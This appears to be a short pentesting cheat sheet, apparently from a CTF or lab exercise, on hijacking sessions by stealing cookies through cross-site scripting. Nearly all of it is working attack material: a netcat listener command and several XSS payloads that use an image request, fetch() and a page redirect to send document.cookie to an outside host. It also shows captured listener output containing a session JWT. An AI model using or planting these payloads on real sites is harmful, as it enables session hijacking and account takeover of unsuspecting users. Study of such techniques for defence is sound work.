Cookie/Session Hijacking

web, xss

Intercepting via netcat #

nc -nlvp 4444
<script>new Image().src="http://10.11.40.33:4444/bogus.php?output="+document.cookie;</script>

➜  marketplace nc -nlvp 4444        
listening on [any] 4444 ...
connect to [10.11.40.33] from (UNKNOWN) [10.11.40.33] 57706
GET /bogus.php?output=token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjQsInVzZXJuYW1lIjoiZGVtbyIsImFkbWluIjpmYWxzZSwiaWF0IjoxNjI4MTU5MzYzfQ.Nka6_SPBNEE1B3PmDWg4p7c3cG3BF4zqhTMCgGa6bJM HTTP/1.1
Host: 10.11.40.33:4444
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://10.10.177.20/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
# using fetch
<script>fetch("http://10.11.40.33:4444/"+document.cookie)</script>

Redirect to another page #

# 10.10.39.208 - victim ip
<script>document.location='http://10.10.39.208/log/'+document.cookie</script>

Other payloads #

# sent by server -> cookie: denied
cookie: granted

References #